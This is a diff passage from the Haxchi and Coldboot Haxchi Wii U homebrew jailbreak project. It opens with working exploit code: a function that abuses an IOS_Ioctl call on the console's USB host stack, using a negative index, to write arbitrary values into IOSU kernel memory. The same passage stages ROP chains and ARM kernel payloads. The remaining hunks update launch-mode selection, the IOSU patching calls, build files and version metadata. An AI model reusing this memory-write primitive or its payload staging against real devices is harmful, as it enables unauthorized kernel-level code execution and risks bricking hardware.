memcpy((char*)(0xF5E50000), arm_user_bin, sizeof(arm_user_bin));
pretend_root_hub[33] = 0x1E00000;
pretend_root_hub[78] = 0;
//! Store current CPU cache into main memory for IOSU to read
DCStoreRange(ayylmao, 0x840);
DCStoreRange((void*)0xF5E20000, sizeof(second_chain));
DCStoreRange((void*)0xF5E30000, sizeof(final_chain));
DCStoreRange((void*)0xF5E40000, sizeof(arm_kernel_bin));
DCStoreRange((void*)0xF5E50000, sizeof(arm_user_bin));
DCStoreRange(pretend_root_hub, 0x160);
}
static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val)
{
void (*DCStoreRange)(const void *addr, uint32_t length);
void (*OSSleepTicks)(uint64_t ticks);
int (*IOS_Ioctl)(int fd, uint32_t request, void *input_buffer,uint32_t input_buffer_len, void *output_buffer, uint32_t output_buffer_len);
OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange);
OSDynLoad_FindExport(coreinit_handle, 0, "OSSleepTicks", &OSSleepTicks);
OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Ioctl", &IOS_Ioctl);
//!------Variables used in exploit------
int *ayylmao = (int*)0xF5E00000;
//!-------------------------------------
ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes
DCStoreRange(ayylmao, 0x840); //! Store current CPU cache into main memory for IOSU to read
OSSleepTicks(0x200000); //! Wait for caches to refresh over in IOSU
//! index 0 is at 0x10149A6C, each index is 0x144 bytes long, so 0x10149A6C - (0x144*0xB349B) = 0x1E60640,
//! which is the physical address of 0xF5E60640 for us, right at the end of MEM1
int request_buffer[] = { -(0xB349B), val };
int output_buffer[32];
return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer));
}

View File

@ -17,6 +17,4 @@ typedef _Bool bool;
#define false 0 #define false 0
#define null 0 #define null 0
#define NULL (void*)0
#endif /* TYPES_H */ #endif /* TYPES_H */

View File

@ -12,8 +12,6 @@ project := .
root := $(CURDIR) root := $(CURDIR)
build := $(root)/bin build := $(root)/bin
CFLAGS += -DUSE_SD_LOADER
ASFLAGS += -DUSE_SD_LOADER
FIRMWARE = 550 FIRMWARE = 550
all: clean setup main all: clean setup main
@ -26,9 +24,9 @@ main:
$(AS) $(ASFLAGS) -DVER=$(FIRMWARE) -c $(project)/crt0.S $(AS) $(ASFLAGS) -DVER=$(FIRMWARE) -c $(project)/crt0.S
cp -r $(root)/*.o $(build) cp -r $(root)/*.o $(build)
rm $(root)/*.o rm $(root)/*.o
$(LD) -o code$(FIRMWARE).elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map code.map $(LD) -o option_select.elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map option_select.map
$(OBJCOPY) code$(FIRMWARE).elf -S -O binary ../code$(FIRMWARE).bin $(OBJCOPY) option_select.elf -S -O binary ../option_select.bin
clean: clean:
rm -rf $(build) rm -rf $(build)
rm -rf code$(FIRMWARE).elf code.map rm -rf option_select.elf option_select.map

View File

@ -7,6 +7,7 @@
#include <string.h> #include <string.h>
#include "types.h" #include "types.h"
#include "coreinit.h" #include "coreinit.h"
#include "../global.h"
typedef struct typedef struct
{ {
@ -111,7 +112,7 @@ uint32_t __main(void)
void*(*MEMAllocFromDefaultHeap)(int size) = (void*)(*pMEMAllocFromDefaultHeap); void*(*MEMAllocFromDefaultHeap)(int size) = (void*)(*pMEMAllocFromDefaultHeap);
void(*MEMFreeToDefaultHeap)(void *ptr) = (void*)(*pMEMFreeToDefaultHeap); void(*MEMFreeToDefaultHeap)(void *ptr) = (void*)(*pMEMFreeToDefaultHeap);
int hbl = 1; int launchmode = LAUNCH_HBL;
//default path goes to HBL //default path goes to HBL
strcpy((void*)0xF5E70000,"/vol/external01/wiiu/apps/homebrew_launcher/homebrew_launcher.elf"); strcpy((void*)0xF5E70000,"/vol/external01/wiiu/apps/homebrew_launcher/homebrew_launcher.elf");
@ -229,7 +230,7 @@ uint32_t __main(void)
} }
else else
__os_snprintf((void*)0xF5E70000,32,"/vol/sdcard"); __os_snprintf((void*)0xF5E70000,32,"/vol/sdcard");
hbl = 0; launchmode = LAUNCH_CFW_IMG;
break; break;
} }
else if(memcmp(FnameChar+fLen-4,".elf",5) == 0) else if(memcmp(FnameChar+fLen-4,".elf",5) == 0)
@ -238,6 +239,12 @@ uint32_t __main(void)
__os_snprintf((void*)0xF5E70000,250,"/vol/external01%s",FnameChar); __os_snprintf((void*)0xF5E70000,250,"/vol/external01%s",FnameChar);
else else
__os_snprintf((void*)0xF5E70000,250,"/vol/external01/%s",FnameChar); __os_snprintf((void*)0xF5E70000,250,"/vol/external01/%s",FnameChar);
launchmode = LAUNCH_HBL;
break;
}
else if(memcmp(FnameChar+fLen-7,"sysmenu",8) == 0)
{
launchmode = LAUNCH_SYSMENU;
break; break;
} }
} }
@ -256,7 +263,32 @@ fileEnd:
if(pBuffer) if(pBuffer)
MEMFreeToDefaultHeap(pBuffer); MEMFreeToDefaultHeap(pBuffer);
if(launchmode == LAUNCH_HBL)
return 0x01800000;
//store path to sd fw.img for arm_kernel
if(launchmode == LAUNCH_CFW_IMG)
DCStoreRange((void*)0xF5E70000,0x100); DCStoreRange((void*)0xF5E70000,0x100);
uint32_t entry = (hbl ? 0x01800000 : 0x0180C000);
return entry; unsigned int sysapp_handle;
OSDynLoad_Acquire("sysapp.rpl", &sysapp_handle);
void (*SYSLaunchMenu)(void);
OSDynLoad_FindExport(sysapp_handle, 0,"SYSLaunchMenu", &SYSLaunchMenu);
int (*OSForceFullRelaunch)(void);
OSDynLoad_FindExport(coreinit_handle, 0, "OSForceFullRelaunch", &OSForceFullRelaunch);
void (*OSExitThread)(int);
OSDynLoad_FindExport(coreinit_handle, 0, "OSExitThread", &OSExitThread);
//do iosu patches
void (*patch_iosu)(unsigned int coreinit_handle, unsigned int sysapp_handle, int launchmode, int from_cbhc) = (void*)0x01804000;
patch_iosu(coreinit_handle, sysapp_handle, launchmode, 0);
if(launchmode == LAUNCH_CFW_IMG)
OSForceFullRelaunch();
SYSLaunchMenu();
OSExitThread(0);
return 0;
} }

View File

@ -125,9 +125,9 @@ int availSort(const void *c1, const void *c2)
void printhdr_noflip() void printhdr_noflip()
{ {
#ifdef CB #ifdef CB
println_noflip(0,"CBHC v1.4 by FIX94"); println_noflip(0,"CBHC v1.4u1 by FIX94");
#else #else
println_noflip(0,"Haxchi v2.3u1 by FIX94"); println_noflip(0,"Haxchi v2.4 by FIX94");
#endif #endif
println_noflip(1,"Credits to smea, plutoo, yellows8, naehrwert, derrek and dimok"); println_noflip(1,"Credits to smea, plutoo, yellows8, naehrwert, derrek and dimok");
} }

View File

@ -1,2 +1,3 @@
a=fw.img a=fw.img
b=sysmenu
default=wiiu/apps/homebrew_launcher/homebrew_launcher.elf default=wiiu/apps/homebrew_launcher/homebrew_launcher.elf

View File

@ -2,9 +2,9 @@
<app version="1"> <app version="1">
<name>CBHC</name> <name>CBHC</name>
<coder>FIX94</coder> <coder>FIX94</coder>
<version>1.4</version> <version>1.4u1</version>
<url>https://github.com/FIX94/haxchi</url> <url>https://github.com/FIX94/haxchi</url>
<release_date>20161216200000</release_date> <release_date>20161219200000</release_date>
<short_description>Coldboot Haxchi Installer</short_description> <short_description>Coldboot Haxchi Installer</short_description>
<long_description>WARNING! This will install Coldboot Haxchi on your system. <long_description>WARNING! This will install Coldboot Haxchi on your system.
ONLY USE THIS IF YOU ARE WILLING TO TAKE A RISK OF BRICKING YOUR CONSOLE. ONLY USE THIS IF YOU ARE WILLING TO TAKE A RISK OF BRICKING YOUR CONSOLE.

View File

@ -2,9 +2,9 @@
<app version="1"> <app version="1">
<name>Haxchi</name> <name>Haxchi</name>
<coder>FIX94</coder> <coder>FIX94</coder>
<version>2.3u1</version> <version>2.4</version>
<url>https://github.com/FIX94/haxchi</url> <url>https://github.com/FIX94/haxchi</url>
<release_date>20161213200000</release_date> <release_date>20161219200000</release_date>
<short_description>Haxchi Installer</short_description> <short_description>Haxchi Installer</short_description>
<long_description>This will install Haxchi on your system. <long_description>This will install Haxchi on your system.
</long_description> </long_description>